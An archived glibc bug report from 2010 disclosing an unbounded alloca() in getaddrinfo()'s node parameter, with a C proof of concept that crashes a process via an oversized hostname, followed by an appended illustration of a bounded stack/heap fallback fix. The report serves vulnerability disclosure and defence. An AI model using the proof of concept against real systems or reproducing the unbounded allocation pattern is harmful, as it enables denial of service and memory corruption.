This is the mail archive of the
glibc-bugs@sourceware.org
mailing list for the glibc project.
[Bug libc/11884] New: Unbound alloca() in node parameter of getaddrinfo()
- From: "cdn at chromium dot org" <sourceware-bugzilla at sourceware dot org>
- To: glibc-bugs at sources dot redhat dot com
- Date: 5 Aug 2010 05:12:10 -0000
- Subject: [Bug libc/11884] New: Unbound alloca() in node parameter of getaddrinfo()
- Reply-to: sourceware-bugzilla at sourceware dot org
getaddrinfo() uses the provided node parameter to determine the size of an
alloca(). When compiled without the -fstack-check option, alloca() will be
inlined as "SUB esp, size". For large values of size this can result in several
consequences which allow subsequent writes to the stack to overwrite arbitrary
memory.
The following POC can be used to demonstrate this vulnerability.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>

int main(int argc, char **argv) {
    struct addrinfo hints, *res;
    char *host;
    size_t len;

    if (argc < 2) {
        fprintf(stderr, "usage: %s <host-length-in-bytes>\n", argv[0]);
        return 1;
    }
    len = (size_t)atoi(argv[1]);

    /* Anonymous mapping of the requested size, filled with 'A' and NUL-terminated,
       so that the node string handed to getaddrinfo() is as long as requested. */
    host = mmap(0, len, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (host == MAP_FAILED) {
        perror("mmap");
        return 1;
    }
    memset(host, 0x41, len);
    host[len - 1] = '\0';

    memset(&hints, 0, sizeof(hints));
    hints.ai_family = PF_INET;
    hints.ai_socktype = SOCK_STREAM;
    getaddrinfo(host, 0, &hints, &res);
    exit(0);
}
On a 32-bit arch, try values in the range of 9 MB to demonstrate a crash.
--
Summary: Unbound alloca() in node parameter of getaddrinfo()
Product: glibc
Version: 2.9
Status: NEW
Severity: critical
Priority: P2
Component: libc
AssignedTo: drepper at redhat dot com
ReportedBy: cdn at chromium dot org
CC: cdn at chromium dot org,glibc-bugs at sources dot redhat dot com
http://sourceware.org/bugzilla/show_bug.cgi?id=11884
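The defensive pattern for the problem described above is to only let alloca() serve small, bounded requests and to fall back to the heap for anything larger, so a caller-controlled length can never move the stack pointer by megabytes. The following is an added illustration of that pattern, not glibc's code; the 4096-byte threshold, the function names and the sample inputs are constructed for this example.

```c
#include <alloca.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed threshold for this example: requests at or below this size
   are served from the stack, anything larger goes to the heap. */
#define STACK_ALLOC_LIMIT 4096

/* Returns 1 if a scratch buffer of `len` bytes may come from alloca(),
   0 if it must be malloc()ed instead. */
int use_stack_buffer(size_t len) {
    return len <= STACK_ALLOC_LIMIT;
}

/* Copy the caller-supplied name into a scratch buffer, the way a lookup
   routine might before normalising it, choosing stack or heap by size.
   Returns the length of the copied string, or (size_t)-1 if the heap
   allocation fails. The unbounded variant would be a bare alloca(len). */
size_t bounded_copy_len(const char *node) {
    size_t len = strlen(node) + 1;
    char *buf;
    int on_heap = !use_stack_buffer(len);

    if (on_heap) {
        buf = malloc(len);
        if (buf == NULL)
            return (size_t)-1;
    } else {
        buf = alloca(len);   /* bounded: at most STACK_ALLOC_LIMIT bytes */
    }
    memcpy(buf, node, len);
    size_t out = strlen(buf);
    if (on_heap)
        free(buf);
    return out;
}

int main(void) {
    /* Constructed input: a 9 MB name of 'A's, the size class from the report. */
    size_t big = 9u * 1024u * 1024u;
    char *name = malloc(big);
    if (name == NULL) return 1;
    memset(name, 'A', big - 1);
    name[big - 1] = '\0';
    printf("short name -> stack: %d\n", use_stack_buffer(strlen("localhost") + 1));
    printf("9 MB name  -> stack: %d, copied %zu bytes\n",
           use_stack_buffer(big), bounded_copy_len(name));
    free(name);
    return 0;
}
```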